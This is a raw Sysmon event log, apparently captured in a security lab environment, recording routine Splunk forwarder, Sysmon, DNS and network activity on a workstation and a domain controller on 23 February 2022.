11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1547-6216-CB04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1547-6216-CB04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.226{4F8D34B0-1547-6216-CB04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000295481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:45.505{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52392- 354300x8000000000000000295480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:44.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49236-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:47.038{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BA3611D87B368E97ADF16B64D8975258,SHA256=CBEA2E9466B9198F60B423B7038A7560F05DD2ADAA232767E6ACC174109959F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:47.038{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E59427DB7FF7A3AC772B7F201BB9E04D,SHA256=7656A813D8A38A32005E5DF0D66BDA7CEB8C59E4825ACA3B1F7BE7253F4786E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:48.635{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7C37C7A98670F1A92CEDF84F21D9C6A,SHA256=293FFB911EBB2E76B279658F70124E9C6A9071936E3934FE4E1B6EEB327C0C00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:48.772{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55D4B29C87B298230E54490B06A21E05,SHA256=70B11C6D7F14876B9FAC0367389ED2AB2B32679C929F88D9E367B5BBFD84E6C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:46.643{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51530-false10.0.1.12-8000- 354300x8000000000000000219610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.799{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51529-false10.0.1.12-8089- 23542300x8000000000000000219609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:48.116{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA57590D710CF63D30514936F0CC710,SHA256=69ECC1D0E21371656DE629A5DD7EFB2317B1D4C27796E75A52E6FE9CAEC9DAE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:45.938{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54874- 23542300x8000000000000000295483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:48.053{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=04A1558B1EEBF529CDF7C1F86DC013F6,SHA256=E35C58CBAD862F1A473C025E862C1B99A8D98F8E38D388D87DD86EB5FB5B66F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:49.654{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A92AB87643A9EF42A6D7F0C4289C34A,SHA256=511B42B0883381D447886A20A1D800BA3381FD5BDC3183BD7FAD2AFCBA223A7F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.959{4F8D34B0-1549-6216-CE04-000000003902}35041616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1549-6216-CE04-000000003902}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1549-6216-CE04-000000003902}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.756{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1549-6216-CE04-000000003902}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.757{4F8D34B0-1549-6216-CE04-000000003902}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000219627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.506{4F8D34B0-1549-6216-CD04-000000003902}18363304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1549-6216-CD04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 